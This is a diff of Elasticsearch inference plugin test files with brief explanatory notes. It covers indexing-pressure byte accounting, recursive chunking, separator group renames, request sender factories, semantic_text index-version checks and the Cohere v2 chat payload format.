+        verify(coordinatingIndexingPressure).increment(1, length(doc4Source));
+        verify(coordinatingIndexingPressure).increment(1, length(doc0UpdateSource));
         if (useLegacyFormat == false) {
-            verify(coordinatingIndexingPressure).increment(1, bytesUsed(doc1UpdateSource));
+            verify(coordinatingIndexingPressure).increment(1, length(doc1UpdateSource));
         }
         verify(coordinatingIndexingPressure, times(useLegacyFormat ? 6 : 7)).increment(eq(0), longThat(l -> l > 0));
@@ -720,7 +720,7 @@ public void testIndexingPressureTripsOnInferenceRequestGeneration() throws Excep
 
         IndexingPressure.Coordinating coordinatingIndexingPressure = indexingPressure.getCoordinating();
         assertThat(coordinatingIndexingPressure, notNullValue());
-        verify(coordinatingIndexingPressure).increment(1, bytesUsed(doc1Source));
+        verify(coordinatingIndexingPressure).increment(1, length(doc1Source));
         verify(coordinatingIndexingPressure, times(1)).increment(anyInt(), anyLong());
 
         // Verify that the coordinating indexing pressure is maintained through downstream action filters
@@ -759,7 +759,7 @@ public void testIndexingPressureTripsOnInferenceRequestGeneration() throws Excep
     public void testIndexingPressureTripsOnInferenceResponseHandling() throws Exception {
         final XContentBuilder doc1Source = IndexRequest.getXContentBuilder(XContentType.JSON, "sparse_field", "bar");
         final InstrumentedIndexingPressure indexingPressure = new InstrumentedIndexingPressure(
-            Settings.builder().put(MAX_COORDINATING_BYTES.getKey(), (bytesUsed(doc1Source) + 1) + "b").build()
+            Settings.builder().put(MAX_COORDINATING_BYTES.getKey(), (length(doc1Source) + 1) + "b").build()
         );
 
         final InferenceStats inferenceStats = new InferenceStats(mock(), mock());
@@ -802,7 +802,7 @@ public void testIndexingPressureTripsOnInferenceResponseHandling() throws Except
 
         IndexingPressure.Coordinating coordinatingIndexingPressure = indexingPressure.getCoordinating();
         assertThat(coordinatingIndexingPressure, notNullValue());
-        verify(coordinatingIndexingPressure).increment(1, bytesUsed(doc1Source));
+        verify(coordinatingIndexingPressure).increment(1, length(doc1Source));
         verify(coordinatingIndexingPressure).increment(eq(0), longThat(l -> l > 0));
         verify(coordinatingIndexingPressure, times(2)).increment(anyInt(), anyLong());
 
@@ -862,14 +862,14 @@ public void testIndexingPressurePartialFailure() throws Exception {
             );
             XContentBuilder builder = XContentFactory.jsonBuilder();
             semanticTextField.toXContent(builder, EMPTY_PARAMS);
-            return bytesUsed(builder);
+            return length(builder);
         };
 
         final InstrumentedIndexingPressure indexingPressure = new InstrumentedIndexingPressure(
             Settings.builder()
                 .put(
                     MAX_COORDINATING_BYTES.getKey(),
-                    (bytesUsed(doc1Source) + bytesUsed(doc2Source) + estimateInferenceResultsBytes.apply(List.of("bar"), barEmbedding)
+                    (length(doc1Source) + length(doc2Source) + estimateInferenceResultsBytes.apply(List.of("bar"), barEmbedding)
                         + (estimateInferenceResultsBytes.apply(List.of("bazzz"), bazzzEmbedding) / 2)) + "b"
                 )
                 .build()
@@ -913,8 +913,8 @@ public void testIndexingPressurePartialFailure() throws Exception {
 
         IndexingPressure.Coordinating coordinatingIndexingPressure = indexingPressure.getCoordinating();
         assertThat(coordinatingIndexingPressure, notNullValue());
-        verify(coordinatingIndexingPressure).increment(1, bytesUsed(doc1Source));
-        verify(coordinatingIndexingPressure).increment(1, bytesUsed(doc2Source));
+        verify(coordinatingIndexingPressure).increment(1, length(doc1Source));
+        verify(coordinatingIndexingPressure).increment(1, length(doc2Source));
         verify(coordinatingIndexingPressure, times(2)).increment(eq(0), longThat(l -> l > 0));
         verify(coordinatingIndexingPressure, times(4)).increment(anyInt(), anyLong());
 
@@ -1124,8 +1124,8 @@ private static BulkItemRequest[] randomBulkItemRequest(
             new BulkItemRequest(requestId, new IndexRequest("index").source(expectedDocMap, requestContentType)) };
     }
 
-    private static long bytesUsed(XContentBuilder builder) {
-        return BytesReference.bytes(builder).ramBytesUsed();
+    private static long length(XContentBuilder builder) {
+        return BytesReference.bytes(builder).length();
     }
 
     @SuppressWarnings({ "unchecked" })
diff --git a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/action/task/StreamingTaskManagerTests.java b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/action/task/StreamingTaskManagerTests.java
index 8ca4a5f2aa309..ba070c2caa56b 100644
--- a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/action/task/StreamingTaskManagerTests.java
+++ b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/action/task/StreamingTaskManagerTests.java
@@ -54,7 +54,7 @@ public void setUp() throws Exception {
         doAnswer(ans -> {
             TaskAwareRequest taskAwareRequest = ans.getArgument(2);
             return taskAwareRequest.createTask(1L, taskType, taskAction, TaskId.EMPTY_TASK_ID, Map.of());
-        }).when(taskManager).register(any(), any(), any());
+        }).when(taskManager).register(any(), any(), any(), eq(false));
     }
 
     @After
@@ -67,7 +67,7 @@ public void testSubscribeRegistersTask() {
 
         processor.subscribe(mock());
 
-        verify(taskManager, only()).register(eq(taskType), eq(taskAction), any());
+        verify(taskManager, only()).register(eq(taskType), eq(taskAction), any(), eq(false));
     }
 
     public void testCancelPropagatesUpstreamAndDownstream() {
@@ -77,7 +77,7 @@ public void testCancelPropagatesUpstreamAndDownstream() {
             var registeredTask = (CancellableTask) taskAwareRequest.createTask(1L, taskType, taskAction, TaskId.EMPTY_TASK_ID, Map.of());
             task.set(registeredTask);
             return registeredTask;
-        }).when(taskManager).register(any(), any(), any());
+        }).when(taskManager).register(any(), any(), any(), eq(false));
 
         Flow.Subscriber downstream = mock();
         Flow.Subscription upstream = mock();
@@ -173,7 +173,7 @@ public void testOnNextAfterCancelDoesNotForwardItem() {
             var registeredTask = (CancellableTask) taskAwareRequest.createTask(1L, taskType, taskAction, TaskId.EMPTY_TASK_ID, Map.of());
             task.set(registeredTask);
             return registeredTask;
-        }).when(taskManager).register(any(), any(), any());
+        }).when(taskManager).register(any(), any(), any(), eq(false));
 
         var processor = streamingTaskManager.create(taskType, taskAction);
         var downstream = establishFlow(processor);
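Note: the bytesUsed -> length rename in ShardBulkInferenceActionFilterTests above matches what the filter accounts against coordinating indexing pressure: the number of serialized source bytes, not the heap footprint of the backing buffer. ramBytesUsed() includes JVM object and array overhead, so it can overshoot the byte count and make the max-bytes limit tests trip at the wrong boundary. A one-line illustration, assuming an XContentBuilder named builder is in scope:

    // serialized size in bytes; this is what indexing pressure should track
    long accounted = BytesReference.bytes(builder).length();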
diff --git a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/chunking/RecursiveChunkerTests.java b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/chunking/RecursiveChunkerTests.java
index baa8429ae3c78..1cb90b11995fc 100644
--- a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/chunking/RecursiveChunkerTests.java
+++ b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/chunking/RecursiveChunkerTests.java
@@ -46,7 +46,7 @@ public void testChunkInputShorterThanMaxChunkSize() {
         assertExpectedChunksGenerated(input, settings, List.of(new Chunker.ChunkOffset(0, input.length())));
     }
 
-    public void testChunkInputRequiresOneSplit() {
+    public void testChunkInputRequiresOneSplitWithoutMerges() {
         List<String> separators = generateRandomSeparators();
         RecursiveChunkingSettings settings = generateChunkingSettings(10, separators);
         String input = generateTestText(2, List.of(separators.getFirst()));
@@ -58,7 +58,23 @@
         );
     }
 
-    public void testChunkInputRequiresMultipleSplits() {
+    public void testChunkInputRequiresOneSplitWithMerges() {
+        List<String> separators = generateRandomSeparators();
+        RecursiveChunkingSettings settings = generateChunkingSettings(20, separators);
+        String input = generateTestText(3, List.of(separators.getFirst(), separators.getFirst()));
+
+        var expectedFirstChunkOffsetEnd = TEST_SENTENCE.length() * 2 + separators.getFirst().length();
+        assertExpectedChunksGenerated(
+            input,
+            settings,
+            List.of(
+                new Chunker.ChunkOffset(0, expectedFirstChunkOffsetEnd),
+                new Chunker.ChunkOffset(expectedFirstChunkOffsetEnd, input.length())
+            )
+        );
+    }
+
+    public void testChunkInputRequiresMultipleSplitsWithoutMerges() {
         var separators = generateRandomSeparators();
         RecursiveChunkingSettings settings = generateChunkingSettings(15, separators);
         String input = generateTestText(4, List.of(separators.get(1), separators.getFirst(), separators.get(1)));
@@ -78,6 +94,22 @@
         );
     }
 
+    public void testChunkInputRequiresMultipleSplitsWithMerges() {
+        var separators = generateRandomSeparators();
+        RecursiveChunkingSettings settings = generateChunkingSettings(25, separators);
+        String input = generateTestText(4, List.of(separators.get(1), separators.getFirst(), separators.get(1)));
+
+        var expectedFirstChunkOffsetEnd = TEST_SENTENCE.length() * 2 + separators.get(1).length();
+        assertExpectedChunksGenerated(
+            input,
+            settings,
+            List.of(
+                new Chunker.ChunkOffset(0, expectedFirstChunkOffsetEnd),
+                new Chunker.ChunkOffset(expectedFirstChunkOffsetEnd, input.length())
+            )
+        );
+    }
+
     public void testChunkInputDoesNotSplitWhenNoLongerExceedingMaxChunkSize() {
         var separators = randomSubsetOf(3, TEST_SEPARATORS);
         RecursiveChunkingSettings settings = generateChunkingSettings(25, separators);
@@ -165,7 +197,7 @@ public void testChunkLongDocument() {
 
     public void testMarkdownChunking() {
         int numSentences = randomIntBetween(10, 50);
-        List<String> separators = SeparatorSet.MARKDOWN.getSeparators();
+        List<String> separators = SeparatorGroup.MARKDOWN.getSeparators();
         List<String> validHeaders = List.of(
             "# Header\n",
             "## Header\n",
diff --git a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/chunking/RecursiveChunkingSettingsTests.java b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/chunking/RecursiveChunkingSettingsTests.java
index 40f14e88d2558..f833aa09b1aee 100644
--- a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/chunking/RecursiveChunkingSettingsTests.java
+++ b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/chunking/RecursiveChunkingSettingsTests.java
@@ -32,15 +32,15 @@ public void testFromMapValidSettingsWithSeparators() {
         assertEquals(separators, settings.getSeparators());
     }
 
-    public void testFromMapValidSettingsWithSeparatorSet() {
+    public void testFromMapValidSettingsWithSeparatorGroup() {
         var maxChunkSize = randomIntBetween(10, 300);
-        var separatorSet = randomFrom(SeparatorSet.values());
-        Map<String, Object> validSettings = buildChunkingSettingsMap(maxChunkSize, Optional.of(separatorSet.name()), Optional.empty());
+        var separatorGroup = randomFrom(SeparatorGroup.values());
+        Map<String, Object> validSettings = buildChunkingSettingsMap(maxChunkSize, Optional.of(separatorGroup.name()), Optional.empty());
 
         RecursiveChunkingSettings settings = RecursiveChunkingSettings.fromMap(validSettings);
 
         assertEquals(maxChunkSize, settings.getMaxChunkSize());
-        assertEquals(separatorSet.getSeparators(), settings.getSeparators());
+        assertEquals(separatorGroup.getSeparators(), settings.getSeparators());
     }
 
     public void testFromMapMaxChunkSizeTooSmall() {
@@ -55,7 +55,7 @@ public void testFromMapMaxChunkSizeTooLarge() {
         assertThrows(ValidationException.class, () -> RecursiveChunkingSettings.fromMap(invalidSettings));
     }
 
-    public void testFromMapInvalidSeparatorSet() {
+    public void testFromMapInvalidSeparatorGroup() {
         Map<String, Object> invalidSettings = buildChunkingSettingsMap(randomIntBetween(10, 300), Optional.of("invalid"), Optional.empty());
 
         assertThrows(ValidationException.class, () -> RecursiveChunkingSettings.fromMap(invalidSettings));
@@ -68,7 +68,7 @@ public void testFromMapInvalidSettingKey() {
         assertThrows(ValidationException.class, () -> RecursiveChunkingSettings.fromMap(invalidSettings));
     }
 
-    public void testFromMapBothSeparatorsAndSeparatorSet() {
+    public void testFromMapBothSeparatorsAndSeparatorGroup() {
         Map<String, Object> invalidSettings = buildChunkingSettingsMap(
             randomIntBetween(10, 300),
             Optional.of("default"),
@@ -86,13 +86,13 @@ public void testFromMapEmptySeparators() {
 
     private Map<String, Object> buildChunkingSettingsMap(
         int maxChunkSize,
-        Optional<String> separatorSet,
+        Optional<String> separatorGroup,
         Optional<List<String>> separators
     ) {
         Map<String, Object> settingsMap = new HashMap<>();
         settingsMap.put(ChunkingSettingsOptions.STRATEGY.toString(), ChunkingStrategy.RECURSIVE.toString());
         settingsMap.put(ChunkingSettingsOptions.MAX_CHUNK_SIZE.toString(), maxChunkSize);
-        separatorSet.ifPresent(s -> settingsMap.put(ChunkingSettingsOptions.SEPARATOR_SET.toString(), s));
+        separatorGroup.ifPresent(s -> settingsMap.put(ChunkingSettingsOptions.SEPARATOR_GROUP.toString(), s));
         separators.ifPresent(strings -> settingsMap.put(ChunkingSettingsOptions.SEPARATORS.toString(), strings));
         return settingsMap;
     }
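Note: after the SeparatorSet -> SeparatorGroup rename above, a recursive chunking configuration names either an explicit separator list or a predefined group, but not both. A sketch of a settings map in the shape these tests build (treat the keys and the fromMap call as read from the test above, not as a documented public API):

    Map<String, Object> settings = new HashMap<>();
    settings.put(ChunkingSettingsOptions.STRATEGY.toString(), ChunkingStrategy.RECURSIVE.toString());
    settings.put(ChunkingSettingsOptions.MAX_CHUNK_SIZE.toString(), 200);
    settings.put(ChunkingSettingsOptions.SEPARATOR_GROUP.toString(), SeparatorGroup.MARKDOWN.name());
    RecursiveChunkingSettings chunking = RecursiveChunkingSettings.fromMap(settings);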
diff --git a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/external/http/sender/HttpRequestSenderTests.java b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/external/http/sender/HttpRequestSenderTests.java
index 81be52bc567e6..d8c8095879b55 100644
--- a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/external/http/sender/HttpRequestSenderTests.java
+++ b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/external/http/sender/HttpRequestSenderTests.java
@@ -58,6 +58,7 @@
 import static org.hamcrest.Matchers.hasSize;
 import static org.hamcrest.Matchers.instanceOf;
 import static org.hamcrest.Matchers.is;
+import static org.hamcrest.Matchers.sameInstance;
 import static org.mockito.ArgumentMatchers.anyString;
 import static org.mockito.Mockito.any;
 import static org.mockito.Mockito.doAnswer;
@@ -90,6 +91,27 @@ public void shutdown() throws IOException, InterruptedException {
         webServer.close();
     }
 
+    public void testCreateSender_ReturnsSameRequestExecutorInstance() {
+        var senderFactory = new HttpRequestSender.Factory(createWithEmptySettings(threadPool), clientManager, mockClusterServiceEmpty());
+
+        var sender1 = createSender(senderFactory);
+        var sender2 = createSender(senderFactory);
+
+        assertThat(sender1, instanceOf(HttpRequestSender.class));
+        assertThat(sender2, instanceOf(HttpRequestSender.class));
+        assertThat(sender1, sameInstance(sender2));
+    }
+
+    public void testCreateSender_CanCallStartMultipleTimes() throws Exception {
+        var senderFactory = new HttpRequestSender.Factory(createWithEmptySettings(threadPool), clientManager, mockClusterServiceEmpty());
+
+        try (var sender = createSender(senderFactory)) {
+            sender.start();
+            sender.start();
+            sender.start();
+        }
+    }
+
     public void testCreateSender_SendsRequestAndReceivesResponse() throws Exception {
         var senderFactory = new HttpRequestSender.Factory(createWithEmptySettings(threadPool), clientManager, mockClusterServiceEmpty());
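Note: the two new HttpRequestSender tests pin down the factory contract this patch relies on: createSender() hands every caller the same underlying sender instance, and start() is idempotent, so independent services can both do

    var sender = senderFactory.createSender(); // same underlying instance for every caller
    sender.start();                            // safe to call again if already started

without double-initialising the HTTP request executor. The AmazonBedrock factory below is reworked to the same shape, which is why the mock request sender moves into the factory constructor there.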
"semantic_text"); + b.field("inference_id", "another_inference_id"); + b.startObject("model_settings"); + b.field("task_type", "sparse_embedding"); + b.endObject(); + }); + assertOldIndexUnsupported(fieldMapping); + } + + private void assertOldIndexUnsupported(XContentBuilder fieldMapping) { + + MapperParsingException exception = assertThrows( + MapperParsingException.class, + () -> createMapperService( + fieldMapping, + true, + IndexVersions.V_8_0_0, + IndexVersionUtils.getPreviousVersion(IndexVersions.NEW_SPARSE_VECTOR) + ) + ); + assertTrue(exception.getMessage().contains(UNSUPPORTED_INDEX_MESSAGE)); + assertTrue(exception.getRootCause() instanceof UnsupportedOperationException); + } + public void testMultiFieldsSupport() throws IOException { if (useLegacyFormat) { Exception e = expectThrows(MapperParsingException.class, () -> createMapperService(fieldMapping(b -> { @@ -1299,7 +1351,11 @@ public void testDefaultIndexOptions() throws IOException { b.field("similarity", "cosine"); b.field("element_type", "float"); b.endObject(); - }), useLegacyFormat, IndexVersions.SEMANTIC_TEXT_DEFAULTS_TO_BBQ_BACKPORT_8_X, IndexVersions.UPGRADE_TO_LUCENE_10_0_0); + }), + useLegacyFormat, + IndexVersions.SEMANTIC_TEXT_DEFAULTS_TO_BBQ_BACKPORT_8_X, + IndexVersionUtils.getPreviousVersion(IndexVersions.UPGRADE_TO_LUCENE_10_0_0) + ); assertSemanticTextField(mapperService, "field", true, null, defaultBbqHnswSemanticTextIndexOptions()); // Previous 8.x index versions do not set BBQ index options diff --git a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/amazonbedrock/client/AmazonBedrockRequestSenderTests.java b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/amazonbedrock/client/AmazonBedrockRequestSenderTests.java index 34b28b642df79..8a6a6a9c5eddf 100644 --- a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/amazonbedrock/client/AmazonBedrockRequestSenderTests.java +++ b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/amazonbedrock/client/AmazonBedrockRequestSenderTests.java @@ -37,7 +37,9 @@ import static org.elasticsearch.xpack.inference.Utils.inferenceUtilityPool; import static org.elasticsearch.xpack.inference.Utils.mockClusterServiceEmpty; import static org.elasticsearch.xpack.inference.services.amazonbedrock.client.AmazonBedrockExecutorTests.TEST_AMAZON_TITAN_EMBEDDINGS_RESULT; +import static org.hamcrest.Matchers.instanceOf; import static org.hamcrest.Matchers.is; +import static org.hamcrest.Matchers.sameInstance; import static org.mockito.Mockito.mock; public class AmazonBedrockRequestSenderTests extends ESTestCase { @@ -60,11 +62,37 @@ public void shutdown() throws IOException, InterruptedException { terminate(threadPool); } + public void testCreateSender_UsesTheSameInstanceForRequestExecutor() throws Exception { + var requestSender = new AmazonBedrockMockExecuteRequestSender(new AmazonBedrockMockClientCache(), mock(ThrottlerManager.class)); + requestSender.enqueue(AmazonBedrockExecutorTests.getTestInvokeResult(TEST_AMAZON_TITAN_EMBEDDINGS_RESULT)); + var senderFactory = createSenderFactory(threadPool, Settings.EMPTY, requestSender); + + var sender1 = createSender(senderFactory); + var sender2 = createSender(senderFactory); + + assertThat(sender1, instanceOf(AmazonBedrockRequestSender.class)); + assertThat(sender2, instanceOf(AmazonBedrockRequestSender.class)); + + assertThat(sender1, sameInstance(sender2)); + } + + public void 
testCreateSender_CanCallStartMultipleTimes() throws Exception { + var requestSender = new AmazonBedrockMockExecuteRequestSender(new AmazonBedrockMockClientCache(), mock(ThrottlerManager.class)); + requestSender.enqueue(AmazonBedrockExecutorTests.getTestInvokeResult(TEST_AMAZON_TITAN_EMBEDDINGS_RESULT)); + var senderFactory = createSenderFactory(threadPool, Settings.EMPTY, requestSender); + + try (var sender = createSender(senderFactory)) { + sender.start(); + sender.start(); + sender.start(); + } + } + public void testCreateSender_SendsEmbeddingsRequestAndReceivesResponse() throws Exception { - var senderFactory = createSenderFactory(threadPool, Settings.EMPTY); var requestSender = new AmazonBedrockMockExecuteRequestSender(new AmazonBedrockMockClientCache(), mock(ThrottlerManager.class)); requestSender.enqueue(AmazonBedrockExecutorTests.getTestInvokeResult(TEST_AMAZON_TITAN_EMBEDDINGS_RESULT)); - try (var sender = createSender(senderFactory, requestSender)) { + var senderFactory = createSenderFactory(threadPool, Settings.EMPTY, requestSender); + try (var sender = createSender(senderFactory)) { sender.start(); var model = AmazonBedrockEmbeddingsModelTests.createModel( @@ -92,10 +120,10 @@ public void testCreateSender_SendsEmbeddingsRequestAndReceivesResponse() throws } public void testCreateSender_SendsCompletionRequestAndReceivesResponse() throws Exception { - var senderFactory = createSenderFactory(threadPool, Settings.EMPTY); var requestSender = new AmazonBedrockMockExecuteRequestSender(new AmazonBedrockMockClientCache(), mock(ThrottlerManager.class)); requestSender.enqueue(AmazonBedrockExecutorTests.getTestConverseResult("test response text")); - try (var sender = createSender(senderFactory, requestSender)) { + var senderFactory = createSenderFactory(threadPool, Settings.EMPTY, requestSender); + try (var sender = createSender(senderFactory)) { sender.start(); var model = AmazonBedrockChatCompletionModelTests.createModel( @@ -116,14 +144,19 @@ public void testCreateSender_SendsCompletionRequestAndReceivesResponse() throws } } - public static AmazonBedrockRequestSender.Factory createSenderFactory(ThreadPool threadPool, Settings settings) { + public static AmazonBedrockRequestSender.Factory createSenderFactory( + ThreadPool threadPool, + Settings settings, + AmazonBedrockMockExecuteRequestSender requestSender + ) { return new AmazonBedrockRequestSender.Factory( ServiceComponentsTests.createWithSettings(threadPool, settings), - mockClusterServiceEmpty() + mockClusterServiceEmpty(), + requestSender ); } - public static Sender createSender(AmazonBedrockRequestSender.Factory factory, AmazonBedrockExecuteOnlyRequestSender requestSender) { - return factory.createSender(requestSender); + public static Sender createSender(AmazonBedrockRequestSender.Factory factory) { + return factory.createSender(); } } diff --git a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/anthropic/AnthropicServiceTests.java b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/anthropic/AnthropicServiceTests.java index 75ce59b16a763..a3f0b01901009 100644 --- a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/anthropic/AnthropicServiceTests.java +++ b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/anthropic/AnthropicServiceTests.java @@ -650,6 +650,15 @@ public void testGetConfiguration() throws Exception { "updatable": false, "type": "str", "supported_task_types": ["completion"] + }, + 
"max_tokens": { + "description": "The maximum number of tokens to generate before stopping.", + "label": "Max Tokens", + "required": true, + "sensitive": false, + "updatable": false, + "type": "int", + "supported_task_types": ["completion"] } } } diff --git a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/cohere/action/CohereActionCreatorTests.java b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/cohere/action/CohereActionCreatorTests.java index 88d26d5d7eef1..6438a328f9fcf 100644 --- a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/cohere/action/CohereActionCreatorTests.java +++ b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/cohere/action/CohereActionCreatorTests.java @@ -209,7 +209,10 @@ public void testCreate_CohereCompletionModel_WithModelSpecified() throws IOExcep assertThat(webServer.requests().get(0).getHeader(HttpHeaders.AUTHORIZATION), is("Bearer secret")); var requestMap = entityAsMap(webServer.requests().get(0).getBody()); - assertThat(requestMap, is(Map.of("message", "abc", "model", "model", "stream", false))); + assertThat( + requestMap, + is(Map.of("messages", List.of(Map.of("role", "user", "content", "abc")), "model", "model", "stream", false)) + ); } } } diff --git a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/cohere/action/CohereCompletionActionTests.java b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/cohere/action/CohereCompletionActionTests.java index 78b8b7bdeaf3e..6c5128956fc9b 100644 --- a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/cohere/action/CohereCompletionActionTests.java +++ b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/cohere/action/CohereCompletionActionTests.java @@ -132,7 +132,10 @@ public void testExecute_ReturnsSuccessfulResponse_WithModelSpecified() throws IO ); var requestMap = entityAsMap(webServer.requests().get(0).getBody()); - assertThat(requestMap, is(Map.of("message", "abc", "model", "model", "stream", false))); + assertThat( + requestMap, + is(Map.of("messages", List.of(Map.of("role", "user", "content", "abc")), "model", "model", "stream", false)) + ); } } diff --git a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/cohere/request/v2/CohereV2CompletionRequestTests.java b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/cohere/request/v2/CohereV2CompletionRequestTests.java index 2fb51ca8ca457..6003a58bf0340 100644 --- a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/cohere/request/v2/CohereV2CompletionRequestTests.java +++ b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/cohere/request/v2/CohereV2CompletionRequestTests.java @@ -46,7 +46,10 @@ public void testCreateRequest() throws IOException { assertThat(httpPost.getLastHeader(CohereUtils.REQUEST_SOURCE_HEADER).getValue(), is(CohereUtils.ELASTIC_REQUEST_SOURCE)); var requestMap = entityAsMap(httpPost.getEntity().getContent()); - assertThat(requestMap, is(Map.of("message", "abc", "model", "required model id", "stream", false))); + assertThat( + requestMap, + is(Map.of("messages", List.of(Map.of("role", "user", "content", "abc")), "model", "required model id", "stream", false)) + ); } public void testDefaultUrl() { @@ -88,6 +91,6 @@ public void testXContents() throws IOException { String 
xContentResult = Strings.toString(builder); assertThat(xContentResult, CoreMatchers.is(""" - {"message":"some input","model":"model","stream":false}""")); + {"messages":[{"role":"user","content":"some input"}],"model":"model","stream":false}""")); } } diff --git a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/cohere/response/CohereCompletionResponseEntityTests.java b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/cohere/response/CohereCompletionResponseEntityTests.java index 4a60dc5033e22..5d7a76a26e597 100644 --- a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/cohere/response/CohereCompletionResponseEntityTests.java +++ b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/cohere/response/CohereCompletionResponseEntityTests.java @@ -64,6 +64,42 @@ public void testFromResponse_CreatesResponseEntityForText() throws IOException { assertThat(chatCompletionResults.getResults().get(0).content(), is("result")); } + public void testFromResponseV2() throws IOException { + String responseJson = """ + { + "id": "abc123", + "finish_reason": "COMPLETE", + "message": { + "role": "assistant", + "content": [ + { + "type": "text", + "text": "Response from the llm" + } + ] + }, + "usage": { + "billed_units": { + "input_tokens": 1, + "output_tokens": 4 + }, + "tokens": { + "input_tokens": 2, + "output_tokens": 5 + } + } + } + """; + + ChatCompletionResults chatCompletionResults = CohereCompletionResponseEntity.fromResponse( + mock(Request.class), + new HttpResult(mock(HttpResponse.class), responseJson.getBytes(StandardCharsets.UTF_8)) + ); + + assertThat(chatCompletionResults.getResults().size(), is(1)); + assertThat(chatCompletionResults.getResults().get(0).content(), is("Response from the llm")); + } + public void testFromResponse_FailsWhenTextIsNotPresent() { String responseJson = """ { diff --git a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/elastic/ElasticInferenceServiceTests.java b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/elastic/ElasticInferenceServiceTests.java index 236a6be3d742d..6ce484954d3ce 100644 --- a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/elastic/ElasticInferenceServiceTests.java +++ b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/elastic/ElasticInferenceServiceTests.java @@ -1243,7 +1243,7 @@ public void testDefaultConfigs_Returns_DefaultEndpoints_WhenTaskTypeIsCorrect() "task_types": ["chat"] }, { - "model_name": "elser-v2", + "model_name": "elser_model_2", "task_types": ["embed/text/sparse"] }, { @@ -1270,7 +1270,7 @@ public void testDefaultConfigs_Returns_DefaultEndpoints_WhenTaskTypeIsCorrect() is( List.of( new InferenceService.DefaultConfigId( - ".elser-v2-elastic", + ".elser-2-elastic", MinimalServiceSettings.sparseEmbedding(ElasticInferenceService.NAME), service ), @@ -1306,7 +1306,7 @@ public void testDefaultConfigs_Returns_DefaultEndpoints_WhenTaskTypeIsCorrect() service.defaultConfigs(listener); var models = listener.actionGet(TIMEOUT); assertThat(models.size(), is(4)); - assertThat(models.get(0).getConfigurations().getInferenceEntityId(), is(".elser-v2-elastic")); + assertThat(models.get(0).getConfigurations().getInferenceEntityId(), is(".elser-2-elastic")); assertThat(models.get(1).getConfigurations().getInferenceEntityId(), is(".multilingual-embed-v1-elastic")); 
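For reference, the Cohere completion changes above move the request body from the v1 "message" string to the v2 "messages" array of role/content objects. A minimal sketch of that payload shape, built with XContent the same way the request tests render it (the class and method names here are illustrative, not the plugin's actual request writer):

import java.io.IOException;
import org.elasticsearch.common.Strings;
import org.elasticsearch.xcontent.XContentBuilder;
import org.elasticsearch.xcontent.XContentFactory;

// Illustrative only: produces the v2 chat payload shape asserted above,
// {"messages":[{"role":"user","content":...}],"model":...,"stream":false}
public final class CohereV2PayloadSketch {
    public static String chatPayload(String input, String modelId) throws IOException {
        XContentBuilder builder = XContentFactory.jsonBuilder();
        builder.startObject();
        builder.startArray("messages");
        builder.startObject();
        builder.field("role", "user");   // the single v1 "message" becomes one user turn
        builder.field("content", input);
        builder.endObject();
        builder.endArray();
        builder.field("model", modelId);
        builder.field("stream", false);
        builder.endObject();
        return Strings.toString(builder);
    }
}
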
